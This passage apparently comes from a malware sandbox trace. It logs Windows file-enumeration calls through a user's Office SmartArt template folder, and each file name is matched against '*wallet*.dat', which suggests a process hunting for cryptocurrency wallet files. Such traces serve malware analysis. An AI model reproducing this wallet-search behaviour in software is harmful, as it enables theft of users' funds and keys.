lpFindFileData=0x19aba0 | out: lpFindFileData=0x19aba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d88102, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98c48439, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98c48439, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19a218, dwReserved1=0x1, cFileName="1033", cAlternateFileName="")) returned 1 [0207.543] PathMatchSpecA (pszFile="1033", pszSpec="*wallet*.dat") returned 0 [0207.543] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\*", lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d88102, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98c48439, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98c48439, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x5e7a88 [0207.545] FindNextFileA (in: hFindFile=0x5e7a88, lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d88102, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98c48439, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98c48439, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0207.546] FindNextFileA (in: hFindFile=0x5e7a88, lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97837aab, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x97837aab, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x97837aab, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1697, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328884[[fn=architecture]].glox", cAlternateFileName="TM0332~4.GLO")) returned 1 [0207.546] PathMatchSpecA (pszFile="TM03328884[[fn=architecture]].glox", pszSpec="*wallet*.dat") returned 0 [0207.546] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328884[[fn=architecture]].glox\\*", lpFindFileData=0x199e90 | out: lpFindFileData=0x199e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97837aab, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x97837aab, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x97837aab, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1697, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="T", cAlternateFileName="J")) returned 0xffffffff [0207.546] FindNextFileA (in: hFindFile=0x5e7a88, lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97fe91ef, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x97fe91ef, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x97fea554, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0xfba, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328893[[fn=BracketList]].glox", cAlternateFileName="TME5C2~1.GLO")) returned 1 [0207.546] PathMatchSpecA (pszFile="TM03328893[[fn=BracketList]].glox", pszSpec="*wallet*.dat") returned 0 [0207.546] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328893[[fn=BracketList]].glox\\*", lpFindFileData=0x199e90 | out: lpFindFileData=0x199e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97fe91ef, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x97fe91ef, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x97fea554, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0xfba, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="T", cAlternateFileName="J")) returned 0xffffffff [0207.546] FindNextFileA (in: hFindFile=0x5e7a88, lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9776d1cd, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9776d1cd, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x9776d1cd, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1093, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328905[[fn=Chevron Accent]].glox", cAlternateFileName="TM0332~2.GLO")) returned 1 [0207.546] PathMatchSpecA (pszFile="TM03328905[[fn=Chevron Accent]].glox", pszSpec="*wallet*.dat") returned 0 [0207.547] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328905[[fn=Chevron Accent]].glox\\*", lpFindFileData=0x199e90 | out: lpFindFileData=0x199e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9776d1cd, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9776d1cd, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x9776d1cd, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1093, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="T", cAlternateFileName="J")) returned 0xffffffff [0207.547] FindNextFileA (in: hFindFile=0x5e7a88, lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97706a49, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x97706a49, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x97707caf, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x41a6, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328908[[fn=Circle Process]].glox", cAlternateFileName="TM0332~1.GLO")) returned 1 [0207.547] PathMatchSpecA (pszFile="TM03328908[[fn=Circle Process]].glox", pszSpec="*wallet*.dat") returned 0 [0207.547] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328908[[fn=Circle Process]].glox\\*", lpFindFileData=0x199e90 | out: lpFindFileData=0x199e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97706a49, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x97706a49, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x97707caf, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x41a6, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="T", cAlternateFileName="J")) returned 0xffffffff [0207.547] FindNextFileA (in: hFindFile=0x5e7a88, lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97de9b8d, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x97de9b8d, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x97deae93, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x2c74, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328916[[fn=Converging Text]].glox", cAlternateFileName="TMF131~1.GLO")) returned 1 [0207.547] PathMatchSpecA (pszFile="TM03328916[[fn=Converging Text]].glox", pszSpec="*wallet*.dat") returned 0 [0207.547] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328916[[fn=Converging Text]].glox\\*", lpFindFileData=0x199e90 | out: lpFindFileData=0x199e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97de9b8d, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x97de9b8d, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x97deae93, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x2c74, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="T", cAlternateFileName="J")) returned 0xffffffff [0207.547] FindNextFileA (in: hFindFile=0x5e7a88, lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98433dab, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98433dab, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98435131, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1788, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328919[[fn=Hexagon Radial]].glox", cAlternateFileName="TM6EE1~1.GLO")) returned 1 [0207.548] PathMatchSpecA (pszFile="TM03328919[[fn=Hexagon Radial]].glox", pszSpec="*wallet*.dat") returned 0 [0207.548] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328919[[fn=Hexagon Radial]].glox\\*", lpFindFileData=0x199e90 | out: lpFindFileData=0x199e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98433dab, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98433dab, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98435131, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1788, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="T", cAlternateFileName="J")) returned 0xffffffff [0207.548] FindNextFileA (in: hFindFile=0x5e7a88, lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98403091, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98403091, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98404408, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x23e7, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328925[[fn=Interconnected Block Process]].glox", cAlternateFileName="TM5FE4~1.GLO")) returned 1 [0207.548] PathMatchSpecA (pszFile="TM03328925[[fn=Interconnected Block Process]].glox", pszSpec="*wallet*.dat") returned 0 [0207.548] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328925[[fn=Interconnected Block Process]].glox\\*", lpFindFileData=0x199e90 | out: lpFindFileData=0x199e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98403091, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98403091, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98404408, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x23e7, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="T", cAlternateFileName="J")) returned 0xffffffff [0207.548] FindNextFileA (in: hFindFile=0x5e7a88, lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x984400fa, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x984400fa, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x984400fa, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x10e6, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328932[[fn=Picture Frame]].glox", cAlternateFileName="TMD322~1.GLO")) returned 1 [0207.548] PathMatchSpecA (pszFile="TM03328932[[fn=Picture Frame]].glox", pszSpec="*wallet*.dat") returned 0 [0207.548] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328932[[fn=Picture Frame]].glox\\*", lpFindFileData=0x199e90 | out: lpFindFileData=0x199e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x984400fa, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x984400fa, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x984400fa, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x10e6, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="T", cAlternateFileName="J")) returned 0xffffffff [0207.548] FindNextFileA (in: hFindFile=0x5e7a88, lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x980f6e44, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x980f6e44, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x980f6e44, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1cca, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328935[[fn=Picture Organization Chart]].glox", cAlternateFileName="TMB8BB~1.GLO")) returned 1 [0207.549] PathMatchSpecA (pszFile="TM03328935[[fn=Picture Organization Chart]].glox", pszSpec="*wallet*.dat") returned 0 [0207.549] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328935[[fn=Picture Organization Chart]].glox\\*", lpFindFileData=0x199e90 | out: lpFindFileData=0x199e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x980f6e44, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x980f6e44, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x980f6e44, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1cca, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="T", cAlternateFileName="J")) returned 0xffffffff [0207.549] FindNextFileA (in: hFindFile=0x5e7a88, lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9824557b, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9824557b, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x9824557b, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x15dc, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328940[[fn=Radial Picture List]].glox", cAlternateFileName="TMC309~1.GLO")) returned 1 [0207.549] PathMatchSpecA (pszFile="TM03328940[[fn=Radial Picture List]].glox", pszSpec="*wallet*.dat") returned 0 [0207.549] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328940[[fn=Radial Picture List]].glox\\*", lpFindFileData=0x199e90 | out: lpFindFileData=0x199e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9824557b, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9824557b, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x9824557b, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x15dc, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="T", cAlternateFileName="J")) returned 0xffffffff [0207.549] FindNextFileA (in: hFindFile=0x5e7a88, lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x978020a2, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x978020a2, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x978034d1, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0xe63, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328951[[fn=Tabbed Arc]].glox", cAlternateFileName="TM0332~3.GLO")) returned 1 [0207.549] PathMatchSpecA (pszFile="TM03328951[[fn=Tabbed Arc]].glox", pszSpec="*wallet*.dat") returned 0 [0207.549] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328951[[fn=Tabbed Arc]].glox\\*", lpFindFileData=0x199e90 | out: lpFindFileData=0x199e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x978020a2, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x978020a2, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x978034d1, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0xe63, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="T", cAlternateFileName="J")) returned 0xffffffff [0207.549] FindNextFileA (in: hFindFile=0x5e7a88, lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x983aecac, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x983aecac, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x983affea, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1318, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328972[[fn=Tab List]].glox", cAlternateFileName="TM2A4A~1.GLO")) returned 1 [0207.549] PathMatchSpecA (pszFile="TM03328972[[fn=Tab List]].glox", pszSpec="*wallet*.dat") returned 0 [0207.549] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328972[[fn=Tab List]].glox\\*", lpFindFileData=0x199e90 | out: lpFindFileData=0x199e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x983aecac, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x983aecac, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x983affea, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1318, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="T", cAlternateFileName="J")) returned 0xffffffff [0207.549] FindNextFileA (in: hFindFile=0x5e7a88, lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x983bfdac, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x983bfdac, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x983bfdac, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1930, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328975[[fn=Theme Picture Accent]].glox", cAlternateFileName="TM8247~1.GLO")) returned 1 [0207.549] PathMatchSpecA (pszFile="TM03328975[[fn=Theme Picture Accent]].glox", pszSpec="*wallet*.dat") returned 0 [0207.550] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328975[[fn=Theme Picture Accent]].glox\\*", lpFindFileData=0x199e90 | out: lpFindFileData=0x199e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x983bfdac, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x983bfdac, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x983bfdac, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1930, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="T", cAlternateFileName="J")) returned 0xffffffff [0207.550] FindNextFileA (in: hFindFile=0x5e7a88, lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98c45cf1, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98c45cf1, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98c47043, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x15fe, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328983[[fn=Theme Picture Alternating Accent]].glox", cAlternateFileName="TM8366~1.GLO")) returned 1 [0207.550] PathMatchSpecA (pszFile="TM03328983[[fn=Theme Picture Alternating Accent]].glox", pszSpec="*wallet*.dat") returned 0 [0207.550] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328983[[fn=Theme Picture Alternating Accent]].glox\\*", lpFindFileData=0x199e90 | out: lpFindFileData=0x199e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98c45cf1, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98c45cf1, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98c47043, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x15fe, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="T", cAlternateFileName="J")) returned 0xffffffff [0207.550] FindNextFileA (in: hFindFile=0x5e7a88, lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9879b688, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9879b688, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x9879b688, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1831, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328986[[fn=Theme Picture Grid]].glox", cAlternateFileName="TM02CE~1.GLO")) returned 1 [0207.550] PathMatchSpecA (pszFile="TM03328986[[fn=Theme Picture Grid]].glox", pszSpec="*wallet*.dat") returned 0 [0207.550] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328986[[fn=Theme Picture Grid]].glox\\*", lpFindFileData=0x199e90 | out: lpFindFileData=0x199e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9879b688, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9879b688, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x9879b688, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1831, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="T", cAlternateFileName="J")) returned 0xffffffff [0207.550] FindNextFileA (in: hFindFile=0x5e7a88, lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98ad5311, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98ad5311, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98ad5311, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0xc03, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328990[[fn=Varying Width List]].glox", cAlternateFileName="TM6E5C~1.GLO")) returned 1 [0207.550] PathMatchSpecA (pszFile="TM03328990[[fn=Varying Width List]].glox", pszSpec="*wallet*.dat") returned 0 [0207.550] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328990[[fn=Varying Width List]].glox\\*", lpFindFileData=0x199e90 | out: lpFindFileData=0x199e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98ad5311, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98ad5311, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98ad5311, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0xc03, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="T", cAlternateFileName="J")) returned 0xffffffff [0207.550] FindNextFileA (in: hFindFile=0x5e7a88, lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98913495, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98913495, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98913495, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x141f, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328998[[fn=Rings]].glox", cAlternateFileName="TM5448~1.GLO")) returned 1 [0207.551] PathMatchSpecA (pszFile="TM03328998[[fn=Rings]].glox", pszSpec="*wallet*.dat") returned 0 [0207.551] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328998[[fn=Rings]].glox\\*", lpFindFileData=0x199e90 | out: lpFindFileData=0x199e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98913495, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98913495, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98913495, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x141f, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="T", cAlternateFileName="J")) returned 0xffffffff [0207.551] FindNextFileA (in: hFindFile=0x5e7a88, lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98913495, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98913495, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98913495, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x141f, dwReserved0=0x207d0, dwReserved1=0x20000, 